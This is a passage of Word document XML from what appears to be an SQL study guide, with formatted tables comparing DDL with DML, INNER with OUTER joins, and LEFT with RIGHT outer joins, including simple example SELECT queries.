          <w:p w14:paraId="258C9DE7"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E927D2A"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Changes are permanent immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74D86A5A"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Changes can be temporary until committed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D3845BA" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D7F93D"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DDL = Structure-related operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62817EFC" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="00CE4B95" w:rsidRDefault="00FB59DE" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DML = Data-related operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CE3535" w14:textId="2DCC5096"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4AAEC51A">
          <v:rect id="_x0000_i3009" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DEAB86" w14:textId="521F324C" w:rsidR="003C547F" w:rsidRPr="00CE4B95" w:rsidRDefault="00615670">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="729" w:name="_Toc196308209"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Inner join and Outer join</w:t>
      </w:r>
      <w:r w:rsidR="003C547F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="729"/>
    </w:p>
    <w:p w14:paraId="7B5C4639" w14:textId="5040F01F" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Here’s the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>difference between INNER JOIN and OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SQ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56"/>
        <w:gridCol w:w="3954"/>
        <w:gridCol w:w="4994"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="5B112898" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DFEFAA3" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59E1F17E" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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INNER JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BFA440B" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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OUTER JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="78BC890E" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C4F3DD0"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4703324C"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Returns only </w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>matching records</w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from both tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60AD705D"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Returns </w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>matching + non-matching records</w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from one or both tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="60932834" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73E2E627"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result Set</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62A460F9"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Includes </w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>only common</w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> data where the join condition is true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57292592"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Includes </w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>common + unmatched</w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> rows filled with NULL from one/both tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="6EF96F4E" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="087A4EC0"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="572BD8E4"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No sub-types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="482C850F"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Three sub-types: </w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>LEFT JOIN, RIGHT JOIN, FULL JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="1C598299" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="723001E3"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36C559BA"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Usually faster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C0FFC93"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Slightly slower due to extra rows with NULLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="381A347B" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30F3F057"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1957FB65"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SELECT * FROM A INNER JOIN B ON A.id = B.id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F541799"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SELECT * FROM A LEFT JOIN B ON A.id = B.id (or RIGHT/FULL JOIN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="605C1BBD" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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Visual Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A0FF52"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INNER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Only where A and B have a match</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636FC893"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LEFT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → All from A + matches from B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526E9CCC"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RIGHT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → All from B + matches from A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78821F70"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FULL OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → All from both, with NULLs where no match</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FD0A05"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Let me know if you’d like Venn diagrams for clarity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517A3F62" w14:textId="2BAA29BB"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50DC3A01">
          <v:rect id="_x0000_i3010" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E2D447" w14:textId="467D125C" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="00615670">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="730" w:name="_Toc196308210"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between left outer join and right outer join</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="730"/>
    </w:p>
    <w:p w14:paraId="5C547D00" w14:textId="10E9A211" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>difference between LEFT OUTER JOIN and RIGHT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SQ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8"/>
        <w:gridCol w:w="4365"/>
        <w:gridCol w:w="4381"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="0EF09219" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="304C48D6" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7992F96E" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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LEFT OUTER JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1677D9F0" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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RIGHT OUTER JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="2ED8E343" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E218E9E"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28690C75"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Returns </w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>all rows from the left table</w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and matching rows from the right table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="610F9BCD"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Returns </w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>all rows from the right table</w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and matching rows from the left table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="2061509B" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5193485F"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Unmatched Rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A4C45D9"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Non-matching rows from the right table are filled with NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B20476E"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Non-matching rows from the left table are filled with NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="64179EAE" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="505E17B5"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44C06CF2"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When you want to keep all records from the </w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>left</w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="252052DD"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When you want to keep all records from the </w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>right</w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="7BA6BD49" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
